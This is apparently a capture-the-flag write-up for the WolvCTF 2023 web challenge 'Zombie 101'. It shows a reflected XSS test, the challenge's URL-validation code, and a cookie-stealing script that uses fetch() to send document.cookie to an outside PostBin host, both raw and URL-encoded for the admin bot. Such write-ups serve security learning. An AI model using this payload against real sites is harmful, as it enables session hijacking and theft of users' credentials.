# Zombie 101

### Category: Web  
### Points: 100

In the challenge description we are given a link to a website with two input
fields.  
It's also noted in the description that this challenge is a classic "steal the
admin's cookie" challenge.

Given two input boxes for this challenge, I immediately test for a XSS
vulnerability  
in the first box and unsurprisingly, I get a pop-up with:  
```html  
<script>alert(0)</script>  
```  
The second form allows you to pass a URL to the 'admin' bot, and it will visit
that page.  
The source code is given to us and we can see the restrictions of the URL we
pass in:

```python  
const validateRequest = (req) => {  
const url = req.query.url  
if (!url) {  
return 'Hmmm, not seeing a URL. Please try again.'  
}

let parsedURL  
try {  
parsedURL = new URL(url)  
}  
catch (e) {  
return 'Something is wrong with your url: ' + escape(e.message)  
}

if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') {  
return 'Our admin is picky. Please provide a url with the http or https
protocol.'  
}

if (parsedURL.hostname !== req.hostname) {  
return `Please provide a url with a hostname of: ${escape(req.hostname)} Hmmm,
I guess that will restrict the submissions. TODO: Remove this restriction
before the admin notices and we all get fired.`  
}

return null  
}  
```

We can craft a simple exploit to steal the admin's cookie and redirect it to
our own server:

```javascript  
<script>  
fetch('https://www.toptal.com/developers/postbin/xxxx-
xxxx?cookie='+document.cookie,{headers: {'Accept': ''}})  
.then(response => response.text())  
.then(text => console.log(text))  
</script>  
```

After injecting this payload into the first input box, we get a URL to give to
the zombie page for the admin to check out.

Submitting this URL:

```  
# https://zombie-101-tlejfksioa-
ul.a.run.app/visit?url=https%3A%2F%2Fzombie-101-tlejfksioa-
ul.a.run.app%2Fzombie%3Fshow%3D%253Cscript%253Efetch%2528%2527https%253A%252F%252Fwww.toptal.com%252Fdevelopers%252Fpostbin%xxxx-
xxxx%253Fcookie%253D%2B%2527%252Bdocument.cookie%252C%257Bheaders%253A%2B%257B%2527Accept%2527%253A%2B%2527%2527%257D%257D%2529%2B.then%2528response%2B%253D%253E%2Bresponse.text%2528%2529%2529%2B.then%2528text%2B%253D%253E%2Bconsole.log%2528text%2529%2529%253C%252Fscript%253E  
```

Gives us the flag in the response from PostBin:

```  
cookie: flag=wctf{c14551c-4dm1n-807-ch41-n1c3-j08-93261}  
```  
![](http://)

Original writeup (https://github.com/marshallstone/ctf-
writeups/blob/main/WolvCTF-2023/Web-Zombie101.md).